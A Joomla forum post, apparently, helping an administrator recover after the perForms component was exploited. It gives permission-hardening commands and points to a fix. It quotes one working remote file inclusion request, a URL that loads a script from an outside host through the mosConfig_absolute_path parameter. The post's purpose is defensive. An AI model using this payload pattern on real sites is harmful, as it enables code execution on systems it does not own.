Unfortunately the perForms component isn't the only one that is exploitable via this method. ExtCal is also known to suffer from this issue (see
http://forum.joomla.org/index.php/topic,75390.0.html).
Three days ago the same thing happened to our old server (fortunately we had moved our sites to our new server the day before!) and the hack managed to replace most files named index and index2 as well as the configuration.php file and a few apache based files.
Fortunately from what I can tell, the db data remains untouched so you should be able to rebuild the site without needing to touch the db then point the new installation at the old db.
I would also strongly advise changing the permissions on your new installation as this will limit the damage caused by such an exploit; if you are on linux I would advise;
chown httpd:httpd -R /path/to/your/site
then make the files readonly;
chmod 550 -R /path/to/your/site
This will require more work when installing components (i.e. you'll have to make the components and administrator/components read/write for the httpd user for the duration of the installation).
Finally, there is a short-term fix available for this exploit although it requires manually editing the sourcecode (I believe it is here;
http://forum.joomla.org/index.php/topic,75390.0.html). The fix should prevent the hacker from directly calling the performs.php file which is what has happened here;
/cms/components/com_performs/performs.php?mosConfig_absolute_path=http://mairie.lhermitage.free.fr/list.txt?
As you can see, they have executed the file directly, which in Joomla is something a component should not allow. I would also contact the creator of the component and inform them of this exploit. They may be able to give you more information regarding a longer term fix.
Login
Register
Rules
FAQ
The team
